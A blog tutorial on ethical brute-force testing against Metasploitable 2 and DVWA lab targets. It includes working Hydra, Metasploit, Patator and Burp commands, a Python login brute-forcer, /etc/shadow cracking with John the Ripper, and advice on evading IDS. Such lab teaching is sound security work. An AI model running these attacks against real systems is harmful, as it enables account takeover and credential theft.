Performing Brute Force Attacks Ethically: A Comprehensive Guide

byEngr. M.A. Rashid Rony
0

Performing Brute Force Attacks Ethically: A Comprehensive Guide

Introduction

Brute force attacks are a penetration testing technique used to test the strength of authentication mechanisms by systematically attempting various username and password combinations. These attacks are critical for identifying weak credentials and improving system security. This article provides a professional, step-by-step guide to performing brute force attacks ethically using tools like THC-Hydra, Burp Suite, and Metasploit, along with other methods such as Patator. We will focus on setting up a controlled environment (e.g., using Metasploitable 2 or Damn Vulnerable Web Application (DVWA)) on a Linux system (Kali Linux), with detailed setup and execution steps. This guide is intended for authorized security testing only, as unauthorized brute forcing is illegal and unethical.

Ethical Note: Brute force attacks must only be performed with explicit permission on systems you own or are authorized to test. Always adhere to legal and ethical guidelines.

Prerequisites

Before proceeding, ensure the following:

  • A Kali Linux system (or another penetration testing distribution) with root access.
  • A target system (e.g., Metasploitable 2 or DVWA) set up in a controlled lab environment.
  • Wordlists for usernames and passwords (e.g., /usr/share/wordlists/rockyou.txt in Kali).
  • Basic knowledge of networking, Linux command-line, and web applications.
  • An internet connection for installing tools.
  • Authorization to perform testing on the target system.

Step 1: Setting Up the Environment

Kali Linux Setup

  1. Update Kali Linux:

sudo apt update && sudo apt upgrade -y

  1. Install Required Tools:
    • THC-Hydra:

sudo apt install hydra -y

    • Burp Suite: Pre-installed in Kali; launch via:

burpsuite

    • Metasploit Framework:

sudo apt install metasploit-framework -y

    • Patator (optional, for advanced brute forcing):

sudo apt install patator -y

Target System Setup

  1. Metasploitable 2:
    • Download from Rapid7 and set up in a virtual machine (e.g., VirtualBox).
    • Configure network settings to NAT or Host-Only for safe testing.
    • Note the IP address (e.g., 192.168.1.100) using:

ifconfig

  1. DVWA:
    • Install DVWA on a web server (e.g., Apache on a Linux VM).
    • Configure DVWA with a LAMP stack:

sudo apt install apache2 mysql-server php libapache2-mod-php -y

    • Download DVWA from GitHub and extract to /var/www/html.
    • Set up the database and configure DVWA as per its documentation.
    • Access DVWA at http://<target-ip>/dvwa.

Step 2: Performing a Brute Force Attack with THC-Hydra

THC-Hydra is a versatile tool for brute forcing various protocols, including SSH, FTP, and HTTP.

Setup

  1. Prepare Wordlists:
    • Use the rockyou.txt wordlist for passwords:

gunzip /usr/share/wordlists/rockyou.txt.gz

    • Create a username list (e.g., users.txt):

echo -e "admin\nroot\ntestuser" > users.txt

SSH Brute Force

  1. Scan Target: Identify open ports using Nmap:

nmap -sS -sV 192.168.1.100

Confirm SSH is running on port 22.

  1. Run Hydra:
    • Attack SSH with a known username (e.g., msfadmin) and password list:

hydra -l msfadmin -P /usr/share/wordlists/rockyou.txt -t 4 ssh://192.168.1.100

    • Parameters:
      • -l: Single username.
      • -P: Password list file.
      • -t 4: Use 4 threads for speed.
    • Output example:

[22][ssh] host: 192.168.1.100 login: msfadmin password: msfadmin

  1. Save Results:

hydra -l msfadmin -P /usr/share/wordlists/rockyou.txt -t 4 -o results.txt ssh://192.168.1.100

HTTP POST Form Brute Force

  1. Identify Login Form: Use Burp Suite to capture the HTTP POST request (see Step 3 for details).
    • Example: DVWA login at http://192.168.1.100/dvwa/vulnerabilities/brute/.
    • Capture POST request body (e.g., username=admin&password=^PASS^&Login=Login).
    • Note the failure message (e.g., “Username and/or password incorrect.”).
  2. Run Hydra:

hydra -l admin -P /usr/share/wordlists/rockyou.txt -t 4 192.168.1.100 http-post-form "/dvwa/vulnerabilities/brute/:username=admin&password=^PASS^&Login=Login:Username and/or password incorrect."

    • Parameters:
      • http-post-form: Specifies HTTP POST attack.
      • Format: <path>:<request_body>:<failure_message>.
    • Output example:

[80][http-post-form] host: 192.168.1.100 login: admin password: password






Step 3: Performing a Brute Force Attack with Burp Suite

Burp Suite is ideal for brute forcing web application login forms, especially with its Intruder module.

Setup

  1. Configure Proxy:
    • Open Burp Suite and go to Proxy > Options. Ensure the proxy is running (default: 127.0.0.1:8080).
    • Configure your browser (e.g., Firefox) to use the proxy:
      • Go to Preferences > Network Settings > Manual Proxy Configuration.
      • Set HTTP Proxy to 127.0.0.1:8080.
  2. Enable Intercept: In Burp Suite, go to Proxy > Intercept and turn on interception.

Brute Force a Web Form

  1. Capture Login Request:
    • Navigate to the DVWA login page (http://192.168.1.100/dvwa/vulnerabilities/brute/).
    • Submit a test login (e.g., username: admin, password: test).
    • In Burp Suite, intercept the POST request and note the request body (e.g., username=admin&password=test&Login=Login).
  2. Send to Intruder:
    • Right-click the intercepted request and select Send to Intruder.
    • In the Intruder > Positions tab, set the attack type to Sniper (for single payload) or Cluster Bomb (for username/password combinations).
    • Highlight the password field (e.g., test) and click Add §.
  3. Configure Payloads:
    • In Intruder > Payloads, select Payload Set 1 and load a password list (e.g., /usr/share/wordlists/rockyou.txt).
    • If brute forcing usernames, add a second payload set for users.txt.
  4. Start Attack:
    • Click Start Attack. Monitor responses for anomalies (e.g., HTTP status code 302 for successful login vs. 200 for failure).
    • Example: A 302 response indicates a redirect, often signaling a successful login.
  5. Analyze Results:
    • Use Intruder > Results to identify successful credentials based on response length or status code.

Note: The free version of Burp Suite (Community Edition) is slower due to single-threaded attacks. Consider the Professional Edition for faster performance.

Step 4: Performing a Brute Force Attack with Metasploit

Metasploit is a penetration testing framework with auxiliary modules for brute forcing services like SSH, FTP, and Telnet.

Setup

  1. Start Metasploit:

msfconsole

SSH Brute Force

  1. Select Module:

use auxiliary/scanner/ssh/ssh_login

  1. Configure Options:

3.  set RHOSTS 192.168.1.100

4.  set USERNAME msfadmin

5.  set PASS_FILE /usr/share/wordlists/rockyou.txt

6.  set THREADS 4

set STOP_ON_SUCCESS true

    • RHOSTS: Target IP.
    • PASS_FILE: Password wordlist.
    • STOP_ON_SUCCESS: Stops when a valid credential is found.
  1. Run the Attack:

run

    • Output example:

[+] 192.168.1.100:22 - Success: 'msfadmin:msfadmin'

  1. Access Session:
    • If successful, a session is created. Use sessions -i to list sessions and sessions <id> to interact.

FTP Brute Force

  1. Select Module:

use auxiliary/scanner/ftp/ftp_login

  1. Configure Options:

3.  set RHOSTS 192.168.1.100

4.  set USER_FILE users.txt

5.  set PASS_FILE /usr/share/wordlists/rockyou.txt

6.  set THREADS 4

set STOP_ON_SUCCESS true

  1. Run the Attack:

run

Step 5: Performing a Brute Force Attack with Patator

Patator is an alternative brute force tool that supports advanced features and is less likely to trigger rate-limiting defenses.

Setup

  1. Ensure Patator is Installed:

sudo apt install patator -y

SSH Brute Force

  1. Run Patator:

patator ssh_login host=192.168.1.100 user=msfadmin password=FILE0 0=/usr/share/wordlists/rockyou.txt -x ignore:mesg='Authentication failed'

    • Parameters:
      • user: Single username or file with usernames.
      • password=FILE0: Password wordlist.
      • -x ignore:mesg='Authentication failed': Ignores failed login messages.
  1. Output:
    • Patator displays valid credentials when found, e.g., msfadmin:msfadmin.

HTTP POST Form Brute Force

  1. Capture Request: Use Burp Suite to capture the POST request (as in Step 3).
  2. Run Patator:

patator http_fuzz url=http://192.168.1.100/dvwa/vulnerabilities/brute/ method=POST body='username=admin&password=FILE0&Login=Login' 0=/usr/share/wordlists/rockyou.txt -x ignore:fgrep='Username and/or password incorrect.'

    • Parameters:
      • url: Target login page.
      • body: POST request body with FILE0 for passwords.
      • -x ignore:fgrep: Ignores responses containing the failure message.

Step 6: Other Brute Force Methods

Custom Python Script

For advanced scenarios (e.g., handling CSRF tokens), a custom Python script can be used:

  1. Install Dependencies:

pip install requests

  1. Example Script (for DVWA):

3.  import requests

4.   

5.  url = "http://192.168.1.100/dvwa/vulnerabilities/brute/"

6.  cookies = {"security": "low", "PHPSESSID": "your_session_id"}

7.  passwords = open("/usr/share/wordlists/rockyou.txt", "r").readlines()

8.   

9.  for password in passwords:

10.    password = password.strip()

11.    data = {"username": "admin", "password": password, "Login": "Login"}

12.    response = requests.post(url, data=data, cookies=cookies)

13.    if "Username and/or password incorrect." not in response.text:

14.        print(f"Success: admin:{password}")

15.        break

16.    else:

        print(f"Failed: {password}")

    • Save as brute.py and run:

python3 brute.py

John the Ripper (Offline Brute Forcing)

If you obtain password hashes (e.g., from /etc/shadow or a compromised database), use John the Ripper for offline brute forcing:

  1. Install John:

sudo apt install john -y

  1. Prepare Hashes:

sudo unshadow /etc/passwd /etc/shadow > hashes.txt

  1. Run John:

john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

  1. View Results:

john --show hashes.txt

Step 7: Testing and Validation

  1. Test Environment:
    • Use Metasploitable 2 or DVWA with known weak credentials (e.g., msfadmin:msfadmin or admin:password).
    • Verify successful logins via SSH, FTP, or web interfaces.
  2. Check Firewall Rules:
    • Ensure the target allows connections:

sudo ufw allow 22,21,80/tcp

  1. Validate Results:
    • Confirm credentials work by logging in manually.
    • Check tool outputs for accuracy.


Step 8: Best Practices for Ethical Brute Forcing

  • Obtain Permission: Always have explicit authorization to test systems.
  • Limit Scope: Only target authorized systems and services.
  • Use Strong Passwords: Post-testing, enforce complex passwords to mitigate risks.
  • Avoid Detection: Use low thread counts (-t 4 in Hydra/Patator) to avoid triggering rate limits or IDS.
  • Secure Data: Delete captured credentials and logs after testing.
  • Combine Tools: Use Burp Suite to capture requests, Hydra/Patator for speed, and Metasploit for post-exploitation.
  • Monitor Performance: Brute forcing is resource-intensive; use powerful systems or cloud instances.
  • Document Findings: Report weak credentials and recommend security improvements.

Conclusion

Brute force attacks, when conducted ethically, are valuable for identifying weak credentials and strengthening system security. This guide covered setting up and executing brute force attacks using THC-Hydra, Burp Suite, Metasploit, and Patator, with additional methods like custom Python scripts and John the Ripper for offline cracking. By following these steps in a controlled lab environment, security professionals can test authentication mechanisms effectively. Always prioritize ethical use, obtain permission, and implement best practices to ensure responsible and legal testing.

References:

  • THC-Hydra: https://www.kali.org/tools/hydra/
  • Burp Suite: https://portswigger.net/burp
  • Metasploit: https://docs.rapid7.com/metasploit/
  • Patator: https://github.com/lanjelot/patator

 

Tags:

Post a Comment

Previous Post Next Post